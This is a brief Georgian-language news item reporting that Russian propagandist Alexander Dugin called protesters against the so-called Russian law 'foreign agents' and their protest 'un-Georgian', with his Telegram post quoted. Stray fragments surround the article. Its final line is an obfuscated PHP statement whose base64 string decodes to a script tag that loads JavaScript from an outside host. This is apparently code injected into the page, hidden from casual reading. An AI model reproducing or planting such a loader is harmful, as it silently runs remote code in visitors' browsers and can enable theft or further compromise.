celsiusi
ავერსი შნაიდერი

 რუსი პროპაგანდისტი ალექსანდრ დუგინი რუსული კანონის საწინააღმდეგო აქციის მონაწილეებს "აგენტებს", მიმდინარე პროტესტს კი "არაქართულს" უწოდებს.

რუსი პროპაგანდისტი პოსტს Telegram-ზე აქვეყნებს.

"საქართველო. აი, ასე იციან უცხოელმა აგენტებმა წიხლების ქნევა, როდესაც მათ სუვერენულ ძალაუფლებას გადათვლა და დაფიქსირება ემუქრება. პირდაპირ სამარცხვინოდ გამოიყურება. ქართველები ამაყი და მორწმუნე ერია. უცხოელი აგენტების ქცევა, რომლებიც პარლამენტის კედლებს აწყდებიან ვნების კვირას, ყველაფერია, გარდა ქართულისა", - წერს დუგინი.

კრემლის პროპაგანდისტი ქართული ოცნების მიერ ინიცირებულ რუსულ კანონს აქამდეც გამოეხმაურა. ის რუსულ კანონს დადებითად აფასებს და ამბობს, რომ ქვეყანა "სწორ გზაზეა".

 

151
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");